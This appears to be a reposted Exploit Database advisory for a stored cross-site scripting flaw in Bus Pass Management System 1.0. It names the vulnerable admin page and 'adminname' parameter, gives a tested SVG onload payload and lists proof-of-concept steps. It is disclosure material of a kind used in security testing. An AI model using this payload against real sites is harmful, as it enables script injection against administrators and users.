Bus Pass Management System 1.0 – ‘adminname’ Stored Cross-Site Scripting (XSS)

• Exploit Database
• 18 阅读

• 作者： Emre Aslan
  日期： 2021-09-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50272/

• # Exploit Title: Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
  # Date: 2021-09-08
  # Exploit Author: Emre Aslan
  # Vendor Homepage: https://phpgurukul.com/
  # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
  # Version: 1.0
  # Tested on: Windows 11 - XAMPP Server
  
  # Vulnerable page: host/admin/*
  
  # Vulnerable Code: <div class="user-info"><div><strong>Admin[PAYLOAD]</strong></div>
  
  # Vulnerable Parameter: adminname[ POST Data ]
  
  # Tested Payload: <svg/onload=alert('XSS')>
  
  # Proof Of Concept:
  
  # 1 - Login the dashboard
  # 2 - Go to /admin/admin-profile.php
  # 3 - set admin name with payload
  # 4 - xss fires